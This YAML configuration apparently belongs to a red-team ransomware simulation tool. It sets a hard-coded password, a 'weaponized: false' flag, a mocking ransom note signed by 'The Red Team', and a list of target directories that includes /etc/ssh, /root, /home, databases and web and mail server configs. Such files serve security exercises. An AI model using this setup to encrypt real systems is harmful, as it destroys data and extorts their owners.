---
public_key: id_rsa.pub
weaponized: false
password: 'redteamlovesyou!'
message: |
    Congratulations,

    You have been infected with a RANSOMWARE!!!!!
    I know. Scary stuff.
    Anyways, Come talk to us about getting some of those super important files
    back.. Or not.. Your choice kid.
    Love,

    ~ The Red Team
targets:
  - /var/spool
  - /etc/ssh
  - /var/named
  - /etc/mail
  - /etc/postfix
  - /var/www
  - /root
  - /home
  - /var/lib/mysql
  - /etc/apache
  - /etc/httpd
  - /dovecot
  - /etc/exim
  - /etc/nginx
